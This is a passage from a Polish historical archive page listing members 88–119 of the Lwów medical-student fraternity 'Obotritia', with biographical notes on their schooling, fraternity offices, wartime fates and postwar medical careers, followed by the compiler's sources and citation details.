 88. Tadeusz Sokół, (15 czerwca 1914 w Czaharach Hrycowieckich w pow. zbaraskim - 21 czerwca 1980 w Warszawie) s. Józefa i Pauliny Nahaj, absolwent II Gimnazjum w Tarnopolu 1935, student med. UJK, c. 1936, akt. 1936-39, plutonowy pchor. rez. piechoty, uczestnik wojny obronnej 1939, w niewoli sowieckiej, wywieziony na roboty do Archangielska, żołnierz II Korpusu PSZ, Cichociemny, zrzucony w 1944, oficer AK, po wojnie student i absolwent 1952 med. UJ, pediatra, lekarz w Nowym Sączu, odznaczony Krzyżem Virtuti Militari i Krzyżem Zasługi
 89. Zbigniew Studzieniecki, (?)
 90. Juljan Mateusz Suski, (9 lipca 1918 w Samborze - ) absolwent Gimnazjum Humanistycznego w Gródku Jagiellońskim 1936, student i absolwent 1941 med. UJK/ULw., c. 1936, akt. 1936-39, dr med. UWr. 1948, ginekolog-położnik, po wojnie lekarz w Bytomiu

  Bronisław Sygnatowicz, 1936/37 r.

 91. Bronisław Stanisław Sygnatowicz, (9 maja 1913 w Nadwórnej - po 1956 we Wrocławiu) absolwent humanistycznego Gimnazjum im. Juliusza Słowackiego w Czortkowie 1932/33, student i absolwent med. UJK 1932-38, akt. 1934-36, skarbnik 1934/35, prezes 1935/36, sekretarz Wzajemnej Pomocy Medyków UJK 1935, ginekolog-położnik, po wojnie lekarz we Wrocławiu

 92. Zbigniew Szarnagiel (Szarnagel), (10 grudnia 1917 w Truskawcu - ) absolwent humanistycznego Gimnazjum w Gródku Jagiellońskim 1936, student med. UJK, c. 1936, akt. 1936-37, student i absolwent med. Uniwersytet w Edynburgu

  Tadeusz Szewczyk, 1936/37 r.

 93. Tadeusz Szewczyk, (30 stycznia 1913 we Lwowie - ok. 1970 w Nysie) z tarnopolszczyzny, student i absolwent 1938 med. UJK, c. 1932, akt. 1932-36, sekretarz 1933/34 (do grudnia), I wiceprezes 1934/35, sekretarz Lwowskiego Koła Międzykorporacyjnego 1933/34 oraz 1934/35, skreślony 1936, sekretarz Wzajemnej Pomocy Medyków UJK 1934, po wojnie lekarz w Nysie

 94. Szlichciński (?), akt. 1932
 95. Zbigniew Szmyd, (?)

  Jacek Szmyt, 1932 r.

 96. Jacek J. Szmyt, (16 marca 1910 w Bochni - ) absolwent Gimnazjum w Chełmie 1927, student i absolwent med. 1927-33, c. 1927, akt. 1927-33, sekretarz 1928/29, 1929/30, 1930/31, prezes 1931/32, dr med. 1936, starszy asystent UJK

  Tadeusz Śnieszko, prawd. ok. 1937 r.

 97. Tadeusz Śnieszko, (18 czerwca 1906 we Lwowie - 1986 w Tarnowie) absolwent Gimnazjum w Hrubieszowie 1927, student i absolwent med. UJK 1927-35, akt. 1931-33, II wiceprezes 1931/32 (?), prezes 1932/33, delegat na XI Zjazd ZPKA, wiceprezes Wzajemnej Pomocy Medyków UJK 1931, w czasie okupacji aresztowany przez Niemców i osadzony w obozie Auschwitz, po wojnie dyrektor szpitala w Tarnowie

  Zbigniew Tabeński, 1936/37 r.

 98. Zbigniew Jacek Tabeński Łada, (17 lutego 1913 w Drohobyczu - 1992) absolwent humanistycznego II Gimnazjum we Lwowie 1932, student i absolwent med. UJK 1932/33-38, c. 1932, akt. 1932-37, II wiceprezes 1935/36, prezes 1936/37, dr med. UWr., chirurg dziecięcy, po wojnie prof. Akademii Rolniczej w Rokitnicy

 99. Tadeusz Jerzy Tarnowski, (11 kwietnia 1915 w Dąbrowie Górniczej - ) student med. UJK, akt. 1939, student i absolwent 1948 med. UP, ginekolog-położnik, po wojnie lekarz w Będzinie
 100. Stanisław Sas-Terlecki, (21 kwietnia 1911 we Lwowie - ) absolwent humanistycznego Gimnazjum we Lwowie 1932/33, student med. UJK 1932/33-37, akt. 1935-37, skarbnik 1935

  Jan Karol Teuchmann, prawd. ok. 1937 r.

 101. Jan Karol Teuchmann, (23 marca 1908 w Starunii pow. Nadwórna - 12 stycznia 1977 w Warszawie) absolwent klasycznego Gimnazjum w Stanisławowie 1928, student i absolwent med. UJK 1929-35, c. 1929, akt. 1929-35, I wiceprezes oraz p.o. prezesa 1930/31, olderman 1933/34 (od grudnia), wiceprezes Lwowskiego Sądu Międzykorporacyjnego 1932, delegat na XI i XIII Zjazd ZPKA, prezes Sądu Honorowego Wzajemnej Pomocy Medyków UJK 1934, po studiach asystent UJK, dr med. UJK 1938, po wojnie kierownik Zakładu Farmakologii AM w Gdańsku, a następnie prof. SGGW w Warszawie

 102. Trembicki, (?) akt. 1932
 103. Stanisław Marian Tutek, (6 sierpnia 1920 w Przemyślu - ) student med. UJK, akt. 1939, student i absolwent 1950 med. UJ, po wojnie lekarz w Gdyni

  Romuald Tuzinkiewicz, 1960 r.

 104. Romuald Tuzinkiewicz, (5 lutego 1916 w Tłumaczu w woj. stanisławowskim - 13 marca 2014 we Wrocławiu) s. Franciszka i Emilii z d. Brzezickiej, absolwent Państwowego Gimnazjum w Tłumaczu 1935, student med. UJK 1935-39, dyplom UWr. 1951, c. 1936, uczestnik wojny obronnej 1939, w czasie okupacji lekarz rejonowy ubezpieczalni społecznej w Rzeszowie z siedzibą w Raniżowie pow. Kolbuszowa, współpracował z AK, w 29 Pułku Piechoty 10 Dywizji Piechoty 2 Armii LWP 1944-45, internista oraz specjalista ochrony zdrowia, lekarz i ordynator szpitala powiatowego we Lwówku Śląskim 1947-51, od 1951 we Wrocławiu, kolejno: starszy asystent Szpitala Wojewódzkiego, dyrektor wydziału zdrowia Urzędu Miejskiego, dyrektor Szpitala Wojewódzkiego im. Józefa Babińskiego, dyrektor ZOZ w dzielnicy Krzyki, przewodniczący wojewódzkiej komisji ds. inwalidztwa i zatrudnienia, ppłk. rez., członek Stowarzyszenia Filistrów Korporacji Akademickich w Poznaniu, odznaczony m.in. Krzyżem Kawalerskim OOP, Złotym Krzyżem Zasługi, Srebrnym Medalem Zasłużony na Polu Chwały, Medalem za Odrę, Nysę i Bałtyk, Medalem za Berlin, Złotym Krzyżem Zasługi PCK, honorową odznaką Wzorowego Pracownika Służby Zdrowia

  Stanisław Uciechowski, 1932 r.

 105. Stanisław Uciechowski, I wiceprezes 1931/32, potem skreślony

 106. Zbigniew Tadeusz Warakomski, (1919 - ) student med. UJK akt. 1939, student i absolwent 1947 med. UW, dr med. Akademia Medyczna w Rokitnicy 1951
 107. Paweł Wieczorek, (14 [15?] sierpnia 1917 w Bobrku w pow. bytomskim - 1996 w Łodzi) student med. UJK 1937-39, c. 1937 akt. 1937-39, w czasie okupacji więzień Auschwitz, po wojnie student i absolwent med. UJ 1945-48, po studiach wcielony do wojska, lekarz wojskowy, pracownik naukowy Wojskowej Akademii Medycznej w Łodzi, służbę zakończył jako ppłk doc. dr

  Wilhelm Wieczorek, ok. 1936 r.

 108. Wilhelm Stefan Wieczorek, (26 grudnia 1912 w Bobrkach k. Bytomia - 7 stycznia 2010 w Tarnowskich Górach) absolwent Gimnazjum Klasycznego w Szarleju na Górnym Śląsku 1934, student med. UJK 1934-39, c. 1934, akt. 1934-39, olderman 1937/38 oraz 1938/39 (?), ppor. rez., więzień obozu koncentracyjnego w Auschwitz, student i absolwent med. UJ 1945-46, internista, po studiach do 1990 lekarz w Głubczycach

  Stanisław Wiglusz, 1932 r.

 109. Stanisław Wiglusz, (23 stycznia 1908 w Starym Samborze - 1980) absolwent klasycznego Gimnazjum w Stryju 1929, student i absolwent med. UJK, student med. UJK 1930-40, c. 1930, akt. 1930-37, sekretarz 1931, wiceprezes 1933, ginekolog-położnik, w 1956 ordynator Oddziału Ginekologiczno-Położniczego w Starogardzie Gdańskim

  Mieczysław Wiśniowski, prawd. ok. 1937 r.

 110. Mieczysław Wiśniowski, (4 maja 1910 w Porażu pow. Lesko - ) absolwent klasycznego Gimnazjum w Sanoku 1929, od 1929 student med. UJK, c. 1929, akt. 1929-33, sekretarz 1931/32, wiceprezes 1932/33, sekretarz 1932 i wiceprezes 1933 Wzajemnej Pomocy Medyków UJK

 111. Zygmunt Włodarczyk, (10 lipca 1914 - ) student med. UJK, akt. 1936, student i absolwent 1943 med. Uniwersytet w Edynburgu, ginekolog-położnik, po wojnie lekarz w Radomsku
 112. Stanisław Wolańczyk, (?)
 113. Alfred Jan Wolf, (21 września 1913 w Samborze - ) absolwent klasycznego Gimnazjum w Samborze 1932/33, student med. UJK 1933/34-37, c. 1933/34, akt. 1933/34-39, ppor. rez.
 114. Woźniakowski (?), akt. 1932

  Mieczysław Wyspiański, 1936/37 r.

 115. Mieczysław Florian Wyspiański, (20 lipca 1908 w Bilitówce pow. Skałat - ok. 1984 w Gliwicach) absolwent klasycznego II Gimnazjum w Tarnopolu 1928/29, student i absolwent med. 1928/29-38 ?, c. 1928/29, akt. 1928/29-37, olderman 1933/34 (do grudnia), wiceprezes 1933/34 (od grudnia), olderman 1934/35 (do wiosny ? 1935), prezes Lwowskiego Koła Międzykorporacyjnego 1934/35, ppor. rez. piechoty, w czasie II wojny światowej lekarz w II Korpusie PSZ, ginekolog-położnik, po wojnie lekarz w Gliwicach

  Władysław Zaleski, prawd. ok. 1937 r.

 116. Władysław Zaleski, (8 czerwca 1904 w Brzeżanach k. Tarnopola - ) student i absolwent 1929 med. UJK, założyciel Obotritii, wiceprezes 1927/28, po wojnie stomatolog w Sosnowcu

 117. Marian Zawirski, (1911 - ) student med. UJK, akt. 1939, student i absolwent 1947 med. UW
 118. Stanisław Włodzimierz Zgorzelski, (17 lutego 1918 w Raciążu - ) akt. 1939, student i absolwent 1947 med. UW, internista, po wojnie lekarz w Warszawie
 119. Teofil Tadeusz Ziemski, (24 marca 1914 w Strusiowie pow. Trembowla - 2004) absolwent klasycznego Gimnazjum w Tarnopolu 1933, student med. UJK 1933-37, c. 1933, akt. 1933-37, wice(?)sekretarz 1933/34, lekarz med., po wojnie lekarz w Krakowie

Pieczęć Obotritii.

Listę członków opracowano na podstawie:

1) Corporatio Obotritia. Księga pamiątkowa dziesięciolecia 1927-1937, Lwów 1937,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Obotritia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 24 IX 2010 r.
Ostatnia zmiana 14 III 2014 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polska Korporacja Akademicka “Obotritia” (Lwów), (na:) www.archiwumkorporacyjne.pl, stan 14 III 2014 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }